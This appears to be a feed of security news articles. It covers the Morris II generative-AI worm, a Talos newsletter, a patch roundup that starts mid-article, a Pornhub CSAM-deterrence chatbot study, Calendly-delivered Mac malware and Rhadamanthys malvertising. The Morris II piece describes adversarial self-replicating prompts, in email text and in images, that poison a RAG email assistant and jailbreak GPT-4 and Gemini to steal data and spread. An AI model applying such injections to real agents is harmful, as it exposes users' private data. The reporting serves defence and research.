Security researchers created an AI worm in a test environment that can automatically spread between generative AI agents—potentially stealing data and sending spam emails along the way.

As generative AI systems like OpenAI's ChatGPT and Google's Gemini become more advanced, they are increasingly being put to work. Startups and tech companies are building AI agents and ecosystems on top of the systems that can complete boring chores for you: think automatically making calendar bookings and potentially buying products. But as the tools are given more freedom, it also increases the potential ways they can be attacked.

Now, in a demonstration of the risks of connected, autonomous AI ecosystems, a group of researchers have created one of what they claim are the first generative AI worms—which can spread from one system to another, potentially stealing data or deploying malware in the process. “It basically means that now you have the ability to conduct or to perform a new kind of cyberattack that hasn't been seen before,” says Ben Nassi, a Cornell Tech researcher behind the research.

Nassi, along with fellow researchers Stav Cohen and Ron Bitton, created the worm, dubbed Morris II, as a nod to the original Morris computer worm that caused chaos across the internet in 1988. In a research paper and website shared exclusively with WIRED, the researchers show how the AI worm can attack a generative AI email assistant to steal data from emails and send spam messages—breaking some security protections in ChatGPT and Gemini in the process.

The research, which was undertaken in test environments and not against a publicly available email assistant, comes as large language models (LLMs) are increasingly becoming multimodal, being able to generate images and video as well as text. While generative AI worms haven’t been spotted in the wild yet, multiple researchers say they are a security risk that startups, developers, and tech companies should be concerned about.

Most generative AI systems work by being fed prompts—text instructions that tell the tools to answer a question or create an image. However, these prompts can also be weaponized against the system. Jailbreaks can make a system disregard its safety rules and spew out toxic or hateful content, while prompt injection attacks can give a chatbot secret instructions. For example, an attacker may hide text on a webpage telling an LLM to act as a scammer and ask for your bank details.

To create the generative AI worm, the researchers turned to a so-called “adversarial self-replicating prompt.” This is a prompt that triggers the generative AI model to output, in its response, another prompt, the researchers say. In short, the AI system is told to produce a set of further instructions in its replies. This is broadly similar to traditional SQL injection and buffer overflow attacks, the researchers say.

To show how the worm can work, the researchers created an email system that could send and receive messages using generative AI, plugging into ChatGPT, Gemini, and open source LLM, LLaVA. They then found two ways to exploit the system—by using a text-based self-replicating prompt and by embedding a self-replicating prompt within an image file.

In one instance, the researchers, acting as attackers, wrote an email including the adversarial text prompt, which “poisons” the database of an email assistant using retrieval-augmented generation (RAG), a way for LLMs to pull in extra data from outside its system. When the email is retrieved by the RAG, in response to a user query, and is sent to GPT-4 or Gemini Pro to create an answer, it “jailbreaks the GenAI service” and ultimately steals data from the emails, Nassi says. “The generated response containing the sensitive user data later infects new hosts when it is used to reply to an email sent to a new client and then stored in the database of the new client,” Nassi says.

In the second method, the researchers say, an image with a malicious prompt embedded makes the email assistant forward the message on to others. “By encoding the self-replicating prompt into the image, any kind of image containing spam, abuse material, or even propaganda can be forwarded further to new clients after the initial email has been sent,” Nassi says.

In a video demonstrating the research, the email system can be seen forwarding a message multiple times. The researchers also say they could extract data from emails. “It can be names, it can be telephone numbers, credit card numbers, SSN, anything that is considered confidential,” Nassi says.

Although the research breaks some of the safety measures of ChatGPT and Gemini, the researchers say the work is a warning about “bad architecture design” within the wider AI ecosystem. Nevertheless, they reported their findings to Google and OpenAI. “They appear to have found a way to exploit prompt-injection type vulnerabilities by relying on user input that hasn't been checked or filtered,” a spokesperson for OpenAI says, adding that the company is working to make its systems “more resilient” and saying developers should “use methods that ensure they are not working with harmful input.” Google declined to comment on the research. Messages Nassi shared with WIRED show the company’s researchers requested a meeting to talk about the subject.

While the demonstration of the worm takes place in a largely controlled environment, multiple security experts who reviewed the research say that the future risk of generative AI worms is one that developers should take seriously. This particularly applies when AI applications are given permission to take actions on someone’s behalf—such as sending emails or booking appointments—and when they may be linked up to other AI agents to complete these tasks. In other recent research, security researchers from Singapore and China have shown how they could jailbreak 1 million LLM agents in under five minutes.

Sahar Abdelnabi, a researcher at the CISPA Helmholtz Center for Information Security in Germany, who worked on some of the first demonstrations of prompt injections against LLMs in May 2023 and highlighted that worms may be possible, says that when AI models take in data from external sources or the AI agents can work autonomously, there is the chance of worms spreading. “I think the idea of spreading injections is very plausible,” Abdelnabi says. “It all depends on what kind of applications these models are used in.” Abdelnabi says that while this kind of attack is simulated at the moment, it may not be theoretical for long.

In a paper covering their findings, Nassi and the other researchers say they anticipate seeing generative AI worms in the wild in the next two to three years. “GenAI ecosystems are under massive development by many companies in the industry that integrate GenAI capabilities into their cars, smartphones, and operating systems,” the research paper says.

Despite this, there are ways people creating generative AI systems can defend against potential worms, including using traditional security approaches. “With a lot of these issues, this is something that proper secure application design and monitoring could address parts of,” says Adam Swanda, a threat researcher at AI enterprise security firm Robust Intelligence. “You typically don't want to be trusting LLM output anywhere in your application.”

Swanda also says that keeping humans in the loop—ensuring AI agents aren’t allowed to take actions without approval—is a crucial mitigation that can be put in place. “You don't want an LLM that is reading your email to be able to turn around and send an email. There should be a boundary there.” For Google and OpenAI, Swanda says that if a prompt is being repeated within its systems thousands of times, that will create a lot of “noise” and may be easy to detect.

Nassi and the research reiterate many of the same approaches to mitigations. Ultimately, Nassi says, people creating AI assistants need to be aware of the risks. “This is something that you need to understand and see whether the development of the ecosystem, of the applications, that you have in your company basically follows one of these approaches,” he says. “Because if they do, this needs to be taken into account.”

Here Come the AI Worms

Apple’s newest encryption technology, called PQ3, now secures iMessages with end-to-end encryption that is quantum-resistant.

Thursday, February 29, 2024 14:00

Apple released a new update for nearly all its devices that provides an all-new type of encryption for its iMessages to the point that, in theory, iMessages are now protected against attacks from quantum computers.  

This is a little tricky because, as we’ve covered before, quantum computers don’t exist yet, and we don’t really know when they might. 

Apple’s newest encryption technology, called PQ3, now secures iMessages with end-to-end encryption that is quantum-resistant. Signal, the secure messaging app of choice for many, launched quantum-resistant encryption for its service in September with its protocol called PQXDH. 

In a blog post, Apple called this update the “most significant cryptographic security upgrade in iMessage history.” 

To the average user, it’s probably tough to fully understand what this means. Private companies and governments are still pouring billions of dollars into developing quantum computers, and it’s more of a theory than a reality. We still don’t know a lot about quantum computing, and whether it could eventually be deployed in a scalable and responsible manner. The second one is created, though, it’s a safe bet that it’s going to fall into the wrong hands. 

Having these protections in place now is a huge step toward the U.S. National Institutes of Standards and Technology’s goal of creating post-quantum encryption everywhere. But change, as we all know, is slow, and it’s too early to start celebrating the idea that we’re all safe from the downsides of quantum computing.  

Eventually, every service, product, etc. that relies on public key infrastructure like SSL and TLS will need to re-examine how they operate and start integrating quantum-resistant algorithms. Think about how long it’s taken our network infrastructure to move from IPv4 to IPv6, and how IPv4 still routes most of today’s internet traffic.  

Then, compare that to Apple and Signal, who get to roll out automatic updates to their users. It’s no guarantee that users are going to install these patches, but most will update their devices overnight without them even noticing, or they’ll just install the update to finally get the pop-up notifcation to go away. Others won’t have that same benefit. 

Deploying PQC to a messaging app is easy enough, next we’ll have to hope that vendors who support web browsers, email clients, wireless routers AND those messaging apps are all on the same page so we can hopefully avoid overwhelming IT teams when we do enter the age of quantum computing.  

**The one big thing **

Cisco Talos researchers have uncovered new details about the tooling and command and control servers used by the Turla APT. The infamous Russian state-sponsored actors was recently spotted spreading the TinyTurla-NG (TTNG) backdoor to issue commands to the infected endpoints. Talos also discovered the use of three other malicious modules deployed via the initial implant, TinyTurla-NG, to maintain access, and carry out arbitrary command execution and credential harvesting. One of these components is a modified agent/client from Chisel, an open-sourced attack framework, used to communicate with a separate C2 server to execute arbitrary commands on the infected systems. 

**Why do I care? **

Turla is a well-known group that has most recently been seen targeting non-governmental organizations (NGOs) in Poland. Talos’ research found that Turla’s new backdoor code is different than its predecessors, which means defenders need to change up their detection methods, too. Our researchers partnered with Cert NGO, an incident response service in Poland, to disclose this information, so potential victims in Poland are now better protected and prepared for this activity.  

**So now what? **

Talos has released new IOCs to provide defenders with new ways to block this actor. Turla also has tools for elevated process execution and credential harvesting, so ensuring that your organization utilizes the principle of least privilege can go a long way toward preventing these attacks. 

**Top security headlines of the week **

**The FBI and other international law enforcement agencies partnered to take down the LockBit ransomware gang’s leak site that it used to extort its victims.** However, several days after the announcement, the group announced it was back online and launched what appears to be a new leak site. As part of the takedown effort, the agencies released new decryption software for victims of LockBit and arrested two suspected operators in Poland and Ukraine at the request of French authorities. The leak site’s page was replaced with information on the decryption key, press releases from the involved law enforcement agencies, charging documents and more. However, after the weekend, LockBit claimed it was back and invited affiliates to re-join its infrastructure. They even returned to extorting one of their current victims, Fulton County, Georgia. Representatives from the Fulton County government said on Monday that the group “re-established a site on the dark web and have once again listed Fulton County as one of their victims, with a renewed threat to release purportedly stolen data.” (CNN, SecurityWeek, WSB-TV) 

**Microsoft expanded its free logging services last week to now provide offerings for all U.S. federal agencies.** The move comes after Chinese state-sponsored actors stole a Microsoft signing key and used it to spy on the emails of U.S. lawmakers last year. Previously, the company charged its cloud services customers extra for access to security logs that could have detected these types of intrusions. Now, they’re available for free. It’s also increasing the default log retention period from 90 days to 180 days (the minimum that Cisco Talos Incident Response has recommended in the past) for logs. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in a statement that it worked with Microsoft, the Office of Management and Budget (OMB) and the Office of the National Cyber Director (ONCD) to roll this program out to select agencies over the past six months. CISA also released a new log management playbook for agencies that “provides further detail on each newly available log and how these logs can be used to support threat hunting and incident-response operations.” (CISA, CyberScoop) 

**U.S. President Joe Biden signed an executive order on Wednesday designed to keep U.S. citizens’ personal information from being sold to companies and organizations in Russia and China,** two of the U.S.’s largest opponents in cyberspace. The executive order identified so-called “countries of concern” where U.S. firms could face punishments for selling personal information to, even if it was collected legitimately. However, the enforcement mechanisms for this must be created and installed, which could take months or longer. The Biden administration hopes to limit foreign entities or foreign-controlled companies that operated in the U.S. from improperly collecting sensitive data. This data includes things like biometrics, health data and geolocation. American lawmakers have long expressed concern that data sold by brokers or even stolen in cyber attacks could be used to spy or blackmail sensitive targets in the U.S., such as government officials and military leaders. Data brokers are legal in the U.S. They usually collect and categorize personal information on users, usually building profiles on them that can be sold to advertisers, social media companies, and more for personalized targeting. (Associated Press, Bloomberg) 

**Can’t get enough Talos? **

*   Talos Takes Ep. #173: The tl;dr of NIS2 
*   Multiple vulnerabilities in Adobe Acrobat Reader could lead to remote code execution 
*    Stop running security in passive mode 
*   Talos Takes Ep. #144: The Reverberations of Volt Typhoon 
*   Google Cloud Run Is ‘Being Abused’ By Cyberattacks Via Microsoft Installers: Cisco Report 

**Upcoming events where you can find Talos **

**BSides Sofia 2024** **(March 23 - 24)** 

_Sofia, Bulgaria_

**S4x24** **(March 24 - 27)** 

Miami Beach, Florida 

_To protect themselves during Russian aggression, the Ukrainian military utilizes electronic warfare to blanket critical infrastructure to defeat radar and GPS-guided smart munitions. This has the unintended consequence of disrupting GPS synchrophasor clock measurements and creating service outages on an already beleaguered and damaged transmission electric grid. Joe Marshall from Talos’ Strategic Communications team will tell an incredible story of how a group of engineers and security professionals from a diverse coalition of organizations came together to solve this electronic warfare GPS problem in an unconventional technical way, and helped stabilize parts of the transmission grid of Ukraine._ 

**RSA** **(May 6 - 9)** 

_San Francisco, California_ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934   
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c   
**Typical Filename:** Wextract   
**Claimed Product:** Internet Explorer   
**Detection Name:** W32.File.MalParent 

**SHA 256:** 9ef2e8714e85dcd116b709894b43babb4a0872225ae7363152013b7fd1bc95bc   
**MD5:** 4813fa6d610e180b097eae0ce636d2aa   
**Typical Filename:** xmrig.exe   
**Claimed Product:** XMRig   
**Detection Name:** Trojan.GenericKD.70491190 

**SHA 256:** a75004c0bf61a2300258d99660552d88bf4e1fe6edab188aad5ac207babcf421   
**MD5:** c44f8ef0bbaeee256bfb62561c2a17db   
**Typical Filename:** ggzokjcqkgcbqiaxoohw.exe   
**Claimed Product:** N/A    
**Detection Name:** Symmi:GenMalicious-tpd 

**SHA 256:** 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf   
**MD5:** 2cfc15cb15acc1ff2b2da65c790d7551   
**Typical Filename:** rcx4d83.tmp   
**Claimed Product:** N/A     
**Detection Name:** Win.Dropper.Pykspa::tpd 

**SHA 256:** 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa     
**MD5:** df11b3105df8d7c70e7b501e210e3cc3     
**Typical Filename:** DOC001.exe     
**Claimed Product:** N/A     
**Detection Name:** Win.Worm.Coinminer::1201

Why Apple added protection against quantum computing when quantum computing doesn’t even exist yet

Plus: Mozilla patches 12 flaws in Firefox, Zoom fixes seven vulnerabilities, and more critical updates from February.

CVE-2024-1553 and CVE-2024-1557 are memory-safety bugs rated as having a high severity. “Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code,” Mozilla researchers said.

Zoom

Video conferencing giant Zoom has issued fixes for seven flaws in its software, one of which has a CVSS score of 9.6. CVE-2024-24691 is an improper-input-validation bug in Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom Meeting SDK for Windows. If exploited, the issue may allow an unauthenticated attacker to escalate their privileges via network access, Zoom said in a security bulletin.

Another notable flaw is CVE-2024-24697, an untrusted-search-path issue in some Zoom 32 bit Windows clients that could allow an authenticated user with local access to escalate their privileges.

Ivanti

In January, Ivanti warned that attackers were targeting two unpatched vulnerabilities in its Connect Secure and Policy Secure products, tracked as CVE-2023-46805 and CVE-2024-21887. With a CVSS score of 8.2 the first authentication-bypass vulnerability in the web component of Ivanti Connect Secure and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.

With a CVSS score of 9.1, the second command injection vulnerability in web components of Ivanti Connect Secure and Ivanti Policy Secure allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance. This vulnerability can be exploited over the internet.

At the end of the month, the firm alerted companies to another two serious flaws, one of which was being exploited in attacks. The exploited issue is a server-side request forgery bug in the SAML component tracked as CVE-2024-21893. Meanwhile, CVE-2024-21888 is a privilege-escalation vulnerability.

Patches were available by February 1, but the issues were deemed so serious that the US Cybersecurity and Infrastructure Security Agency (CISA) advised disconnecting all Ivanti products by February 2.

On February 8, Ivanti released a patch for yet another issue tracked as CVE-2024-22024, which prompted another CISA warning.

Fortinet

Fortinet has issued a patch for a critical issue with a CVSS score of 9.6, which it says is already being used in attacks. Tracked as CVE-2024-21762, the code-execution flaw impacts FortiOS versions 6.0, 6.2, 6.4, 7.0, 7.2 and 7.4. The out-of-bounds write vulnerability can be used for arbitrary code execution using specially crafted HTTP requests, Fortinet said.

It came just days after the firm released a patch for two issues in its FortiSIEM products, CVE-2024-23108 and CVE-2024-23109, rated as critical with a CVSS score of 9.7. The flaw in FortiSIEM Supervisor could allow a remote unauthenticated attacker to execute unauthorized commands via crafted API requests, Fortinet said in an advisory.

Cisco

Cisco has listed multiple vulnerabilities in its Expressway Series that could allow an unauthenticated, remote attacker to conduct cross-site request forgery attacks.

Tracked as CVE-2024-20252 and CVE-2024-20254, two vulnerabilities in the API of Cisco Expressway Series devices have been given a CVSS score of 9.6. “An attacker could exploit these vulnerabilities by persuading a user of the API to follow a crafted link,” Cisco said. “A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user.”

SAP

Enterprise software firm SAP has released 13 security updates as part of its SAP Security Patch Day. CVE-2024-22131 is a code-injection vulnerability in SAP ABA with a CVSS score of 9.1.

CVE-2024-22126 is a cross-site scripting vulnerability in NetWeaver AS Java listed as having a high impact, with a CVSS score of 8.8. “Incoming URL parameters are insufficiently validated and improperly encoded before including them into redirect URLs,” security firm Onapsis said. “This can result in a cross-site scripting vulnerability, leading to a high impact on confidentiality and mild impact on integrity and availability.”

Here Are the Google and Microsoft Security Updates You Need Right Now

Every time someone in the UK searched for child abuse material on Pornhub, a chatbot appeared and told them how to get help.

For the past two years, millions of people searching for child abuse videos on Pornhub’s UK website have been interrupted. Each of the 4.4 million times someone has typed in words or phrases linked to abuse, a warning message has blocked the page, saying that kind of content is illegal. And in half the cases, a chatbot has also pointed people to where they can seek help.

The warning message and chatbot were deployed by Pornhub as part of a trial program, conducted with two UK-based child protection organizations, to find out whether people could be nudged away from looking for illegal material with small interventions. A new report analyzing the test, shared exclusively with WIRED, says the pop-ups led to a decrease in the number of searches for child sexual abuse material (CSAM) and saw scores of people seek support for their behavior.

“The actual raw numbers of searches, it’s actually quite scary high,” says Joel Scanlan, a senior lecturer at the University of Tasmania, who led the evaluation of the reThink Chatbot. During the multiyear trial, there were 4,400,960 warnings in response to CSAM-linked searches on Pornhub’s UK website—99 percent of all searches during the trial did not trigger a warning. “There’s a significant reduction over the length of the intervention in numbers of searches,” Scanlan says. “So the deterrence messages do work.”

Millions of images and videos of CSAM are found and removed from the web every year. They are shared on social media, traded in private chats, sold on the dark web, or in some cases uploaded to legal pornography websites. Tech companies and porn companies don’t allow illegal content on their platforms, although they remove it with different levels of effectiveness. Pornhub removed around 10 million videos in 2020 in an attempt to eradicate child abuse material and other problematic content from its website following a damning _New York Times_ report.

Pornhub, which is owned by parent company Aylo (formerly MindGeek), uses a list of 34,000 banned terms, across multiple languages and with millions of combinations, to block searches for child abuse material, a spokesperson for the company says. It is one way Pornhub tries to combat illegal material, the spokesperson says, and is part of the company’s efforts aimed at user safety, after years of allegations it has hosted child exploitation and nonconsensual videos. When people in the UK have searched for any of the terms on Pornhub’s list, the warning message and chatbot have appeared.

The chatbot was designed and created by the Internet Watch Foundation (IWF), a nonprofit which removes CSAM from the web, and the Lucy Faithfull Foundation, a charity which works to precent child sexual abuse. It appeared alongside the warning messages a total of 2.8 million times. The trial counted the number of sessions on Pornhub, which could mean people are counted multiple times, and it did not look to identify individuals. The report says there was a “meaningful decrease” in searches for CSAM on Pornhub and that at least “in part” the chatbot and warning messages appear to have played a role.

The chatbot was relatively simple: It asked people a series of questions, allowing them to click buttons to answer or type out a response. Ultimately, it explained that the material people were searching for may be illegal and pointed them toward the Lucy Faithfull Foundation’s help services. There were 1,656 requests for more information made through the chatbot, while 490 people clicked through to the charity’s Stop It Now website. Around 68 people called or chatted with Lucy Faithfull’s confidential helpline, the report says.

Donald Findlater, the director of the Stop It Now helpline, says that while the numbers are “relatively modest” compared to the overall number of warnings displayed, they are still seen as a “big success” as it’s a sign that people may want to get help. “If people have been doing something dodgy on a site, clicking through is quite a bold step to make,” Findlater says.

The vast majority of people who received the warning message and chatbot did so only once, the report says. Around 1.7 million people saw a warning before leaving Pornhub or making other searches related to legal material. “They didn't just disappear. They typically remained on the site and looked for other stuff,” Findlater says. “The influence for the millions of people that actually did a dubious search and then stopped doing that dubious search is a big win.” Not everyone was deterred, however. In the most persistent cases, around 400 people made 10 searches that triggered the message.

Cynthia Najdowski, an associate professor of psychology at the State University of New York at Albany, who was not involved in the research, says the chatbot appears to show promise for interrupting some people’s efforts to access CSAM. Warning messages and small behavioral nudges have been used in multiple ways to change people’s behavior online, from piracy and copyright infringement to gambling. Google has used some deterrence messages around child abuse searches since 2013, and other studies have found decreases in searches and millions of views or warnings.

Najdowski says there are three things known about deterring people from engaging in criminal behavior: People must know what they’re doing is illegal; they need to apply that “legal knowledge” to their own behavior; and they need to believe the cost of the behavior may outweigh any benefits they expect. “A chatbot that delivers notice of the potential illegality of certain searches can certainly accomplish the first step in the deterrence process, and that alone is a significant contribution,” Najdowski says. It may struggle to help cases where people are more persistent in their behavior or more complex scenarios though.

Scanlan, who conducted the analysis into the chatbot trial, says there were some complexities with the work. The data provided by Pornhub, the IWF, and the Lucy Faithfull Foundation wasn’t always complete, and there weren’t any figures from before the warnings were introduced to compare the results against. However, Scanlan says the results show the method could be one part of broader education and deterrence efforts against people finding CSAM online. “If someone's doing that sort out of curiosity, you want to nudge them away from it before they get involved in it, because we can't arrest our way out of the problem,” Scanlan says.

Scanlan’s findings say that over time, the web traffic being referred to the Stop It Now website appeared to decrease, perhaps as people who continued to search became used to the messaging. However, helpline calls, emails, and online chats showed an increase over the duration of the trial. The report says that in the future, a variety of messages could be used—potentially including existing deterrence videos—and the chatbot could directly connect people to a live chat session with Lucy Faithfull’s helpline.

The chatbot itself could also be improved. Since it was initially designed and created, says Dan Sexton, the chief technology officer at the IWF, generative AI has changed people’s perceptions of what chatbots are and how they interact with people. The reThink Chatbot could respond to only a limited number of queries. Sexton says there may be ways to make the chatbot more approachable and better handle questions it was not programmed to deal with.

While the trial period has ended, the chatbot and warnings are still in place on Pornhub’s UK website. “There's certainly no plans to turn it off. It is in production. It was a pilot project, but it is having an effect right now,” Sexton says. Those involved in the study say that other porn companies could look to introduce similar nudges across their services and deter people from looking for child abuse content. “They all should be doing this; it should become the norm,” Scanlan says. “This report and technology are significant steps forward in identifying, removing, and reporting harmful and illegal content,” a spokesperson for Pornhub says. “We feel all other major tech and social media platforms should explore the implementation of similar deterrence technology to create a safer internet for all.”

Findlater, from the Stop It Now helpline, says he hopes other companies, such as social media websites and file-hosting platforms, can look at the results of the trial and introduce similar nudges where people are seeking CSAM. “The more places you can put it, the greater chance you're going to catch those people that might be at a stage where they can still be helped, or those people that are looking for help but don't know about it,” Sexton says.

A Pornhub Chatbot Stopped Millions From Searching for Child Abuse Videos

Malicious hackers are targeting people in the cryptocurrency space in attacks that start with a link added to the target’s account at Calendly, a popular free calendar application for scheduling appointments and meetings. The attackers impersonate established cryptocurrency investors and ask to schedule a video conference call. But clicking the meeting link provided by the scammers prompts the user to run a script that quietly installs malware on macOS systems.

Malicious hackers are targeting people in the cryptocurrency space in attacks that start with a link added to the target’s calendar at **Calendly**, a popular application for scheduling appointments and meetings. The attackers impersonate established cryptocurrency investors and ask to schedule a video conference call. But clicking the meeting link provided by the scammers prompts the user to run a script that quietly installs malware on **macOS** systems.

KrebsOnSecurity recently heard from a reader who works at a startup that is seeking investment for building a new blockchain platform for the Web. The reader spoke on condition that their name not be used in this story, so for the sake of simplicity we’ll call him **Doug**.

Being in the cryptocurrency scene, Doug is also active on the instant messenger platform **Telegram**. Earlier this month, Doug was approached by someone on Telegram whose profile name, image and description said they were **Ian Lee**, from **Signum Capital**, a well-established investment firm based in Singapore. The profile also linked to Mr. Lee’s Twitter/X account, which features the same profile image.

The investor expressed interest in financially supporting Doug’s startup, and asked if Doug could find time for a video call to discuss investment prospects. Sure, Doug said, here’s my Calendly profile, book a time and we’ll do it then.

When the day and time of the scheduled meeting with Mr. Lee arrived, Doug clicked the meeting link in his calendar but nothing happened. Doug then messaged the Mr. Lee account on Telegram, who said there was some kind of technology issue with the video platform, and that their IT people suggested using a different meeting link.

Doug clicked the new link, but instead of opening up a videoconference app, a message appeared on his Mac saying the video service was experiencing technical difficulties.

“Some of our users are facing issues with our service,” the message read. “We are actively working on fixing these problems. Please refer to this script as a temporary solution.”

Doug said he ran the script, but nothing appeared to happen after that, and the videoconference application still wouldn’t start. Mr. Lee apologized for the inconvenience and said they would have to reschedule their meeting, but he never responded to any of Doug’s follow-up messages.

It didn’t dawn on Doug until days later that the missed meeting with Mr. Lee might have been a malware attack. Going back to his Telegram client to revisit the conversation, Doug discovered his potential investor had deleted the meeting link and other bits of conversation from their shared chat history.

In a post to its Twitter/X account last month, **Signum Capital** warned that a fake profile pretending to be their employee Mr. Lee was trying to scam people on Telegram.

The file that Doug ran is a simple Apple Script (file extension “.scpt”) that downloads and executes a malicious trojan made to run on macOS systems. Unfortunately for us, Doug freaked out after deciding he’d been tricked — backing up his important documents, changing his passwords, and then reinstalling macOS on his computer. While this a perfectly sane response, it means we don’t have the actual malware that was pushed to his Mac by the script.

But Doug does still have a copy of the malicious script that was downloaded from clicking the meeting link (the online host serving that link is now offline). A search in Google for a string of text from that script turns up a December 2023 blog post from cryptocurrency security firm **SlowMist** about phishing attacks on Telegram from North Korean state-sponsored hackers.

“When the project team clicks the link, they encounter a region access restriction,” SlowMist wrote. “At this point, the North Korean hackers coax the team into downloading and running a ‘location-modifying’ malicious script. Once the project team complies, their computer comes under the control of the hackers, leading to the theft of funds.”

Image: SlowMist.

SlowMist says the North Korean phishing scams used the “Add Custom Link” feature of the Calendly meeting scheduling system on event pages to insert malicious links and initiate phishing attacks.

“Since Calendly integrates well with the daily work routines of most project teams, these malicious links do not easily raise suspicion,” the blog post explains. “Consequently, the project teams may inadvertently click on these malicious links, download, and execute malicious code.”

SlowMist said the malware downloaded by the malicious link in their case comes from a North Korean hacking group dubbed “**BlueNoroff**, which **Kaspersky Labs** says is a subgroup of the **Lazarus** hacking group.

“A financially motivated threat actor closely connected with Lazarus that targets banks, casinos, fin-tech companies, POST software and cryptocurrency businesses, and ATMs,” Kaspersky wrote of BlueNoroff in Dec. 2023.

The North Korean regime is known to use stolen cryptocurrencies to fund its military and other state projects. A recent report from **Recorded Future** finds the Lazarus Group _has stolen approximately $3 billion in cryptocurrency over the past six years_.

While there is still far more malware out there today targeting **Microsoft Windows** PCs, the prevalence of information-stealing trojans aimed at macOS users is growing at a steady clip. MacOS computers include **X-Protect**, Apple’s built-in antivirus technology. But experts say attackers are constantly changing the appearance and behavior of their malware to evade X-Protect.

“Recent updates to macOS’s XProtect signature database indicate that Apple are aware of the problem, but early 2024 has already seen a number of stealer families evade known signatures,” security firm **SentinelOne** wrote in January.

According to **Chris Ueland** from the threat hunting platform Hunt.io, the Internet address of the fake meeting website Doug was tricked into visiting (104.168.163,149) hosts or very recently hosted about 75 different domain names, many of which invoke words associated with videoconferencing or cryptocurrency. Those domains indicate this North Korean hacking group is hiding behind a number of phony crypto firms, like the six-month-old website for **Cryptowave Capital** (cryptowave\[.\]capital).

The increasing frequency of new Mac malware is a good reminder that Mac users should not depend on security software and tools to flag malicious files, which are frequently bundled with or disguised as legitimate software.

As KrebsOnSecurity has advised Windows users for years, a good rule of safety to live by is this: _If you didn’t go looking for it, don’t install it._ Following this mantra heads off a great deal of malware attacks, regardless of the platform used. When you do decide to install a piece of software, make sure you are downloading it from the original source, and then keep it updated with any new security fixes.

On that last front, I’ve found it’s a good idea not to wait until the last minute to configure my system before joining a scheduled videoconference call. Even if the call uses software that is already on my computer, it is often the case that software updates are required before the program can be used, and I’m one of those weird people who likes to review any changes to the software maker’s privacy policies or user agreements _before_ choosing to install updates.

Most of all, verify new contacts from strangers before accepting anything from them. In this case, had Doug simply messaged Mr. Lee’s real account on Twitter/X or contacted Signum Capital directly, he would discovered that the real Mr. Lee never asked for a meeting.

If you’re approached in a similar scheme, the response from the would-be victim documented in the SlowMist blog post is probably the best.

Image: SlowMist.

Calendar Meeting Links Used to Spread Mac Malware

Infostealers like Rhadamanthys continue to be a favorite among malware distributors who leverage search engine ads to lure victims.

It was just a little over a year ago that the Rhadamanthys stealer was first publicly seen distributed via malicious ads. Throughout 2023, we observed a continuation in malvertising chains related to software downloads.

Fast forward to 2024 and the same malvertising campaigns are still going on. After a lull last summer, we noticed an increase since the fall which so far has been sustained. The most recent targeted searches are for Parsec and FreeCad, followed by WinSCP, Advanced IP Scanner, Slack and Notion.

Threat actors are targeting business users with payloads such as FakeBat, Nitrogen or Hijackloader. One other malware family we have seen here and there is Rhadamanthys. In this blog post, we detail the latest distribution chain related to this malware.

**Key points**

*   Rhadamanthys is an infostealer distributed via malspam and malvertising.
*   Google searches for popular software such as Notion return malicious ads.
*   Threat actors are using decoy websites to trick users into downloading malware.
*   The initial payload is a dropper that retrieves Rhadamanthys via a URL pasted online.
*   The TexBin paste site shows the URL was seen/accessed 8.5K times.

**Malicious ad**

Threat actors continue to impersonate well-known brands via sponsored search results. As can be seen below in a search for Notion (productivity software), an extremely deceiving ad is shown. Because it includes the official logo and website for Notion, most users will not think twice and click on the link.

While the ad looks real on the surface, the Google Ads Transparency Center page (which can be accessed by clicking on the menu right next to the ad’s URL) shows this ad was created by a certain ‘BUDNIK PAWEŁ’ from Poland. According to the same report, the first ad first appeared on January 23, 2024.

As a matter of fact, we have been tracking this fraudulent advertiser for a few weeks and had reported it to Google in early February, when we first ran into it. At the time, victims who clicked the ad and visited the site were tricked with a download for NetSupport RAT.

In this more recent campaign, the threat actor is pushing Rhadamanthys as the final payload, after an initial dropper. In the web traffic seen below, we can see that the threat actor uses a number of redirects to evade detection. URL shorteners and redirectors are quite common for the initial ad click, often followed by an attacker-controlled domain responsible for cloaking traffic.

There is one more check within the browser via JavaScript to detect virtual machines before the actual landing page is displayed to the victim.

**Landing page and payload**

The landing page is the decoy site that victims will see after they click on the ad. Apart from the URL in the address bar, it looks very similar to the official web site for Notion, although somewhat simplified. There are two download buttons, one for Mac and the other for Windows.

The Mac payload (Notion.dmg) is a new variant of Atomic Stealer. Thanks to Luis Castellanos from Block for sharing a sample with us.

The Windows binary is a signed file but its digital signature is not valid. The name of the signer that shows here is from the inventor of PuTTY, a popular admin tool. This digital certificate is likely fake or was revoked, but it may evade detection in some cases.

This dropper contacts the paste site _TextBin_ where it retrieves a URL for the followup payload, Rhadamanthys. If the numbers are correct this unlisted paste was viewed 8.5k times already.

Rhadamanthys attempts to steal credentials stored in applications such as PuTTY, WinSCP and mail programs (screenshot from Joe Sandbox):

Upon execution, Rhadamanthys reports to its command and control server, sends and receives data.

**Conclusion**

Not a lot has changed with malvertising campaigns focused on software downloads as we enter the second year of actively tracking them. Sponsored search results continue to be highly misleading due to the fact that any verified individual is able to impersonate popular brands by using their logo and official site within the ad itself.

We are aware of reports shared within private circles, that businesses were compromised after an employee clicked on a malicious ad. Follow-up activities post infection include the usual ‘pentesting tools’ that precede a company-wide breach or ransomware deployment.

The infrastructure used in this particular attack was reported to the relevant parties. Malwarebytes and ThreatDown customers are protected against the payloads and distribution sites.

Additionally, EDR customers who have DNS Filtering can proactively block online ads by enabling the rule for advertisements. This is a simple, and yet powerful way to prevent malvertising across an entire organization or in specific areas.

Endpoint users will see a customizable message when they click on an ad such as those that appear on a search engine results page:

**Indicators of Compromise**

Malvertising chain

pantovawy.page\[.\]link
cerisico\[.\]net
notione.my-apk\[.\]com
alternativebehavioralconcepts\[.\]org

Dropper

6f4a0cc0fa22b66f75f5798d3b259d470beb776d79de2264c2affc0b5fa924a2

Dropper IP

